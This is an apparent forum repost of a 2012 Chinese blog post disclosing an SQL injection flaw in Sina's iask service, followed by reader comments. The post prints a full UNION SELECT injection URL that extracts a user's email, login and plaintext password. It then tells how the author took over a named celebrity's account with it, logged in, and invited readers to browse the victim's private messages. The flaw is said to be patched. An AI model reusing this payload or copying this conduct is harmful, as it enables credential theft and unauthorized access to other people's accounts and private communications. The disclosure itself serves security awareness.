2012年新浪微博用户密码泄露漏洞(图片解析)

鉴客 发布于 2012/01/05 08:48
阅读 13K+
收藏 21

相关厂商:www.sina.com
作者:http://weibo.com/evilniang
发现时间:2012-1-1
漏洞类型:sql注射
危害等级:高
漏洞状态:已修复

首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。

新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

漏洞存在点: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。通过修改字段还可以获取其他信息 。

直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867



直接构造地址

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

直接获得刘谦的账号和密码



这里账号是luchenmagic密码为2lo*****(保密)

尝试登陆



成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。

接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。

后话:

1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。

2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?

3.网络泄密涉及到太多。不管是普通网民,还是明星名人,都被牵涉进来。这里测试不少明星,基本上都能通过微薄获取他们的私人信息,甚至登陆他们的msn。(香港爆料杂志来找我把。开个玩笑。。。)

4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。(我是无私奉献白帽子,被活雷锋了。)

5.祝新年快乐。
----------------------------------------------------
游侠补充:
刚从流量统计系统看到阅读者暴增,原来是文中例子的主角刘谦先生在微博发了一条……好吧:这个事情,仅仅是刘谦先生的粉丝在做个安全测试,并无恶意。我们都喜欢刘先生的魔术。
谢谢刘谦先生给我博客打广告……来西安我请你吃肉夹馍、羊肉泡馍——管饱! :)
另:文章是新浪打了补丁之后作者才发出来的,看到本文的时候还想测试的话……晚了。嘿嘿

文章出处:http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html

加载中
1
RickyFeng
RickyFeng
不会是国家规定明文吧
1
Hazelnut
Hazelnut
老大哥面前没有隐私
1
码农首席
码农首席

呵呵,数据库固然有漏洞,但这次泄露涉及的网站如此之多,很多网站用的架构都不同,一个数据库漏洞远无法解释这个大规模泄露事件.

事实上这些不同类型的网站只有的一个共同点,那就是处于国家网络监控中心的监控之下.早在很久以前就有人提出网监对国内网络的监控方案可能造成不稳定的因素.相对于这次的泄露是网站本身造成的说法,还不如研究一下问题是否更多地出自于网监身上.

当然,我等P民连新浪这种网站都撬不动分毫,就更不用说去责问网监这种国家部门了.在黑客跳出来解释之前,我们只能继续猜测问题到底出在哪了.

0
林四哥
林四哥

看到LIMIT这个关键字就知道是什么数据库了!CSDN说MS SQL不安全,换上MySQL难道就安全了?!!!

 

蟋蟀哥哥
蟋蟀哥哥
sql注入,是没有过滤好用户输入造成的.oracle都存在这个问题..说mysql安全性好点,是因为可以可以运行在linux下.sql server必须在MS下
0
xu81.com
xu81.com
国内厂商都是满嘴跑火车的主,信他们的不如信春哥,信春哥2012船票得
goodluck
goodluck
您说的太客气了,岂止厂商? 整个天朝皆如此,从上到下每个角落
0
一剑倾城
一剑倾城
见证奇迹的时刻~
0
核桃博客
核桃博客

这有点奇怪啊,这看上去说的是新浪微博的密码也是明文保存?

 

0
7月
7月
明文密码 , 靠
0
poster
poster
youxia這次又出風頭了點~
0
走南闯北
走南闯北
怎么这么多网站都酷爱明文呀。。。
返回顶部
顶部